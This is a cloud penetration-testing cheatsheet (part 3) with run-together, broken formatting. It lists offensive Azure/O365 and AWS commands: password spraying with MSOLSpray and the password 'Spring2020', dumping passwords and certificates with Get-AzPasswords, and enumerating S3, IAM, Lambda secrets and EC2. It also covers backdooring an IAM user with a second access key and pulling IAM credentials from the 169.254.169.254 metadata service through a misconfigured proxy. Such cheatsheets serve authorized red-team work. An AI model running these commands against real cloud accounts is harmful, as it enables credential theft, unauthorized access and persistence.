Cloud Pen-testing Part -3
## Microsoft Azure & O365 CLI Tool Cheatsheet (Part-3)
### Other Azure & O365 Tools
#### Look for open storage blobs
```powershell
Invoke-EnumerateAzureBlobs -Base $BaseNameExport SSL/TLS certs
Get-AzPasswords -ExportCerts YAzure Container Registry dump
Get-AzPasswords
Get-AzACRPowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter
MSOLSpray
Tool to password spray Azure/O365
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020Amazon Web Services (AWS) CLI Tool Cheatsheet
Authentication
# Set AWS programmatic keys for authentication (use --profile= for a new profile)
aws configureOpen S3 bucket enumeration
List the contents of an S3 bucket
aws s3 ls s3://<bucketname>/Download contents of a bucket
aws s3 sync s3://bucketname s3-files-dirAccount Information
Get basic account info
aws sts get-caller-identityList IAM users
aws iam list-usersList IAM roles
aws iam list-rolesList S3 buckets accessible to an account
aws s3 lsVirtual Machines
List EC2 instances
aws ec2 describe-instancesWebApps & SQL
List WebApps
aws deploy list-applications### List AWS RDS (SQL)
```shell
aws rds describe-db-instances --region <region name>Serverless
List Lambda Functions
aws lambda list-functions --region <region>Look at environment variables set for secrets and analyze code
aws lambda get-function --function-name <lambda function>Networking
List EC2 subnets
aws ec2 describe-subnetsList EC2 network interfaces
aws ec2 describe-network-interfacesList DirectConnect (VPN) connections
aws directconnect describe-connectionsBackdoors
List access keys for a user
aws iam list-access-keys --user-name <username>Backdoor account with a second set of access keys
aws iam create-access-key --user-name <username>Instance Metadata Service URL
http://169.254.169.254/latest/meta-dataAdditional IAM credentials possibly available here
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and misconfigured
curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/metadata/iam/security-credentials/ && echoIMDS Version 2 has some protections, but these commands can be used to access it
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"Last updated
Was this helpful?